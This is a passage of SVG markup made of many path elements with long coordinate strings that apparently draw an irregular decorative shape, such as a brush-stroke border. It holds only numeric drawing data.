d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8